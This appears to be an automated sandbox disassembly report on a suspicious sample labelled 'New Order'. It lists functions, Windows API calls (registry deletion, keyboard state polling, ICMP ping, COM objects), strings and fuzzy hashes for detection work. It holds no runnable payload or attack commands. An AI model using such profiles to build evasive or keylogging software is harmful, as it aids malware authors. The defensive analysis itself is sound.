Opcode ID: 49dfc0808305eb5335cb2048d149d687190cf80c6227db7ac15fa8e5a51919d7
Instruction ID: 218db7463ec525680eefe40618293402f4c73457ce84d305e7718e95cd2029b9
Opcode Fuzzy Hash: 49dfc0808305eb5335cb2048d149d687190cf80c6227db7ac15fa8e5a51919d7
Instruction Fuzzy Hash: 894112329903107EDB06B775EC47EFF37ACEF45710F50006AF905A6192EB719A208BA4

Function 0034CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0034CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0034CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0034CD48

Part of subcall function 0034CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0034CCAA
Part of subcall function 0034CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0034CCBD
Part of subcall function 0034CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0034CCCF
Part of subcall function 0034CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0034CD05
Part of subcall function 0034CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0034CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0034CCF3

Strings

advapi32.dll, xrefs: 0034CCB8
RegDeleteKeyExW, xrefs: 0034CCC9

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: e9084a928dce9ebc54bc3d8b9202c722baeb9c8cc14bf92d7fc419367d8e39ad
Instruction ID: fffe29bbb0313568d27baf1e4fbec24e16297a317324fb04fec2bc9cb76265b3
Opcode Fuzzy Hash: e9084a928dce9ebc54bc3d8b9202c722baeb9c8cc14bf92d7fc419367d8e39ad
Instruction Fuzzy Hash: 4D31A071912228BFD7228B50DC88EFFBBBCEF02754F001065E906E7150DA30AE45DAA0

Function 0032E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0032E6B4

Part of subcall function 002DE551: timeGetTime.WINMM(?,?,0032E6D4), ref: 002DE555

Sleep.KERNEL32(0000000A), ref: 0032E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0032E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0032E727
SetActiveWindow.USER32 ref: 0032E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0032E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0032E773
Sleep.KERNEL32(000000FA), ref: 0032E77E
IsWindow.USER32 ref: 0032E78A
EndDialog.USER32(00000000), ref: 0032E79B

Strings

BUTTON, xrefs: 0032E719

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: bacd8c668d28b507fce09e57eaffda7456586cf5e706e23ae2a1f39713de8580
Instruction ID: cf6e87940be82b7079ee3069aea654f2923bf57c8b398f9b47780da8549aea87
Opcode Fuzzy Hash: bacd8c668d28b507fce09e57eaffda7456586cf5e706e23ae2a1f39713de8580
Instruction Fuzzy Hash: CA21A170214711BFEB035F64FCCAA273B6DF75534EF142426F842816B2DBB2AC008A24

Function 0032E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0032EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0032EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0032EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0032EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0032EAA7

Strings

open , xrefs: 0032EA0C
play PlayMe, xrefs: 0032EAA2
alias PlayMe, xrefs: 0032EA36
play PlayMe wait, xrefs: 0032EA91
close PlayMe, xrefs: 0032EA6E, 0032EA9B
status PlayMe mode, xrefs: 0032EA58

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 916f848cd48cb2db8ec642c4aabf3c07c606183aa37ca30a5f7ef65dc90026ef
Instruction ID: cc9a43c9e8ffdb46bf928696c425b02dfffcfd9866654278c0a9370ae54574bc
Opcode Fuzzy Hash: 916f848cd48cb2db8ec642c4aabf3c07c606183aa37ca30a5f7ef65dc90026ef
Instruction Fuzzy Hash: AF112131A6036979D721B7A1EC5BEFF6A7CEBD1B00F400569F411A20D1EB705A55CAB0

Function 00325CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00325CE2
GetWindowRect.USER32(00000000,?), ref: 00325CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00325D59
GetDlgItem.USER32(?,00000002), ref: 00325D69
GetWindowRect.USER32(00000000,?), ref: 00325D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00325DCF
GetDlgItem.USER32(?,000003E9), ref: 00325DDD
GetWindowRect.USER32(00000000,?), ref: 00325DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00325E31
GetDlgItem.USER32(?,000003EA), ref: 00325E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00325E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00325E67

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 96ed17114f52e5848051e44ce0118243d7b4f047faa342a6edc835f30f82de9e
Instruction ID: 7a5662436ec7f738e615a314dbc622cbe7d2b003dd7a15dbbd3708a14553a1cb
Opcode Fuzzy Hash: 96ed17114f52e5848051e44ce0118243d7b4f047faa342a6edc835f30f82de9e
Instruction Fuzzy Hash: EA512D71B10715AFDB19CF68DD89AAEBBB9FB48301F158129F915E6290D7709E00CB50

Function 002D8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 002D8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002D8BE8,?,00000000,?,?,?,?,002D8BBA,00000000,?), ref: 002D8FC5

DestroyWindow.USER32(?), ref: 002D8C81
KillTimer.USER32(00000000,?,?,?,?,002D8BBA,00000000,?), ref: 002D8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00316973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,002D8BBA,00000000,?), ref: 003169A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,002D8BBA,00000000,?), ref: 003169B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,002D8BBA,00000000), ref: 003169D4
DeleteObject.GDI32(00000000), ref: 003169E6

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: bf90036fe24936836266fb52ff70b52ccfc6352ced49e71298b47f8376ae169d
Instruction ID: dae1a120334409155aceb61f5cc9617b7f670bcd7f08e7d40d64a77b7757ae06
Opcode Fuzzy Hash: bf90036fe24936836266fb52ff70b52ccfc6352ced49e71298b47f8376ae169d
Instruction Fuzzy Hash: E3619C31122701DFCB2B9F14C949B6A77F5FB44316F14551BE042ABAA0CB72ADA0CF90

Function 002D9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 002D9944: GetWindowLongW.USER32(?,000000EB), ref: 002D9952

GetSysColor.USER32(0000000F), ref: 002D9862

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 7fb7ee2873b3c31cda1a7b3633a404283d8cf6d5e02907774f76dbed28533ac2
Instruction ID: d06200e186d0168b717b6cdc2924ef1284e800d20a7f11a46275931901102009
Opcode Fuzzy Hash: 7fb7ee2873b3c31cda1a7b3633a404283d8cf6d5e02907774f76dbed28533ac2
Instruction Fuzzy Hash: D741C4311257409FDB215F389C88BF93769AB07735F184606F9A2872F1D7319D91EB10

Function 003296E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0030F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00329717
LoadStringW.USER32(00000000,?,0030F7F8,00000001), ref: 00329720

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0030F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00329742
LoadStringW.USER32(00000000,?,0030F7F8,00000001), ref: 00329745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00329866

Strings

Line %d:, xrefs: 003297A0
^ ERROR, xrefs: 003297FB
Line %d (File "%s"):, xrefs: 0032978F
Error: , xrefs: 0032981D
%s (%d) : ==> %s: %s %s, xrefs: 0032984A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 71b95deca66b9e7e85fc5ac04520b988c3ff3403975c4ab60f017acb66cb2aa8
Instruction ID: 63dd962eb63971195ee72f85ca273c1458562d136d3155ee9501420de4ffd8f2
Opcode Fuzzy Hash: 71b95deca66b9e7e85fc5ac04520b988c3ff3403975c4ab60f017acb66cb2aa8
Instruction Fuzzy Hash: 52413C72910219AADB05FBE0DD86EEE7378AF14344F10466AF60573092EB356F58CF61

Function 00343C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00343C5C
CoInitialize.OLE32(00000000), ref: 00343C8A
CoUninitialize.OLE32 ref: 00343C94
_wcslen.LIBCMT ref: 00343D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00343DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00343ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00343F0E
CoGetObject.OLE32(?,00000000,0035FB98,?), ref: 00343F2D
SetErrorMode.KERNEL32(00000000), ref: 00343F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00343FC4
VariantClear.OLEAUT32(?), ref: 00343FD8

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: b1c22d697ca745dffc78853d295bf8c2ccec6001098fed7fa449c2d19ffd9dcc
Instruction ID: 37f19ea6581bf1020d1f10ecc7ef26ccc3ff292787532de10152cafdc21a2bcd
Opcode Fuzzy Hash: b1c22d697ca745dffc78853d295bf8c2ccec6001098fed7fa449c2d19ffd9dcc
Instruction Fuzzy Hash: 4AC13571608305AFD702DF68C88492BBBE9FF89748F10491DF98A9B261D731EE45CB52

Function 00337A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00337AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00337B8F
SHGetDesktopFolder.SHELL32(?), ref: 00337BA3
CoCreateInstance.OLE32(0035FD08,00000000,00000001,00386E6C,?), ref: 00337BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00337C74
CoTaskMemFree.OLE32(?,?), ref: 00337CCC
SHBrowseForFolderW.SHELL32(?), ref: 00337D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00337D7A
CoTaskMemFree.OLE32(00000000), ref: 00337D81
CoTaskMemFree.OLE32(00000000), ref: 00337DD6
CoUninitialize.OLE32 ref: 00337DDC

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 75c4841964560a27fbb40d6bc3869853930cf48acaa55fc52baa613a1885c705
Instruction ID: 0f7f9d7177a86128659bae40e379f7f3a596c03ee71ea9f6a939d4f473c38d86
Opcode Fuzzy Hash: 75c4841964560a27fbb40d6bc3869853930cf48acaa55fc52baa613a1885c705
Instruction Fuzzy Hash: F4C10975A14209AFCB15DF64C888DAEBBF9FF48304F148599E81A9B261D730EE45CF90

Function 0035541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00355504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00355515
CharNextW.USER32(00000158), ref: 00355544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00355585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0035559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003555AC

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: e4e97613ed7226bd613cad9fa61128b61f1654bd31657b7b6df52a33ec0b4952
Instruction ID: 73e6b7d40376bdaaa255ff053764f877aaa71d8d3ff13cc3f02597ef3f9adac5
Opcode Fuzzy Hash: e4e97613ed7226bd613cad9fa61128b61f1654bd31657b7b6df52a33ec0b4952
Instruction Fuzzy Hash: DC61AE70904609EFDF128F91CC94DFE7BB9EB09326F114145F925AA2B0D774AA88DB60

Function 0031FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0031FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0031FB08
VariantInit.OLEAUT32(?), ref: 0031FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0031FB3A
VariantCopy.OLEAUT32(?,?), ref: 0031FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0031FBA1
VariantClear.OLEAUT32(?), ref: 0031FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0031FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0031FBCC
VariantClear.OLEAUT32(?), ref: 0031FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0031FBE9

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 47b5e214e143990bd9df0f54ae7b5177ee547bc36518ad3d85bc8d6f85f87e39
Instruction ID: 80ebe042e4e3e962d9f7c187c56749fc83b55e85b3aa705cf2176557b879da3f
Opcode Fuzzy Hash: 47b5e214e143990bd9df0f54ae7b5177ee547bc36518ad3d85bc8d6f85f87e39
Instruction Fuzzy Hash: EC416075A103199FCB06DF65C854DEEBBB9FF48349F008069E945A7261CB30A986CFA0

Function 00329C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00329CA1
GetAsyncKeyState.USER32(000000A0), ref: 00329D22
GetKeyState.USER32(000000A0), ref: 00329D3D
GetAsyncKeyState.USER32(000000A1), ref: 00329D57
GetKeyState.USER32(000000A1), ref: 00329D6C
GetAsyncKeyState.USER32(00000011), ref: 00329D84
GetKeyState.USER32(00000011), ref: 00329D96
GetAsyncKeyState.USER32(00000012), ref: 00329DAE
GetKeyState.USER32(00000012), ref: 00329DC0
GetAsyncKeyState.USER32(0000005B), ref: 00329DD8
GetKeyState.USER32(0000005B), ref: 00329DEA

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 50c1899fc0663336da847273fbd9f28d2df88fd6c99c8566f1239b66a89d4240
Instruction ID: 2c861f7d1241c308cd56a8906b64881496f1b727f2d7937f17069e66318532e2
Opcode Fuzzy Hash: 50c1899fc0663336da847273fbd9f28d2df88fd6c99c8566f1239b66a89d4240
Instruction Fuzzy Hash: EA41F8345047E96DFF338764E8043B5BEE06F12344F0A845FDAC6565C2EBA499C8D7A2

Function 0034055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 003405BC
inet_addr.WSOCK32(?), ref: 0034061C
gethostbyname.WSOCK32(?), ref: 00340628
IcmpCreateFile.IPHLPAPI ref: 00340636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003406C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003406E5
IcmpCloseHandle.IPHLPAPI(?), ref: 003407B9
WSACleanup.WSOCK32 ref: 003407BF

Strings

Ping, xrefs: 00340676

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 4d851822ea97148e9001f27cba8bb1f430fc7d6d9ba24656f666a64f26b6b1b9
Instruction ID: a5df90d5ad99026fc1ac45936f02a2850d1f03630ed14a132414b6eef397b874
Opcode Fuzzy Hash: 4d851822ea97148e9001f27cba8bb1f430fc7d6d9ba24656f666a64f26b6b1b9
Instruction Fuzzy Hash: 3D915A356082019FD326DF15C489F1ABBE4EF44318F1585A9E56A8FAA2C730FD45CF92

Function 00348CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00348CF3

Part of subcall function 00328E54: _wcslen.LIBCMT ref: 00328E77

_wcslen.LIBCMT ref: 00348D4E
_wcslen.LIBCMT ref: 00348D9C
_wcslen.LIBCMT ref: 00348DDC
_wcslen.LIBCMT ref: 00348E6E

Strings

winapi, xrefs: 00348D96, 00348D9B
stdcall, xrefs: 00348DD6, 00348DDB
none, xrefs: 00348E65, 00348E6A
cdecl, xrefs: 00348D48, 00348D4D

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: a8fc99d786345a014dee20b030277b389bdae64560ff1c347663aaf5de6d3206
Instruction ID: 217f8c2b51b01deaf464690f0d9448b2dc14fdb876506f1089935216accbef94
Opcode Fuzzy Hash: a8fc99d786345a014dee20b030277b389bdae64560ff1c347663aaf5de6d3206
Instruction Fuzzy Hash: F451B231A011169BCB16EF6CC9409BEB7E5BF65324B214229E426EB2C4DB30ED80CBD0

Function 0034372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00343774
CoUninitialize.OLE32 ref: 0034377F
CoCreateInstance.OLE32(?,00000000,00000017,0035FB78,?), ref: 003437D9
IIDFromString.OLE32(?,?), ref: 0034384C
VariantInit.OLEAUT32(?), ref: 003438E4
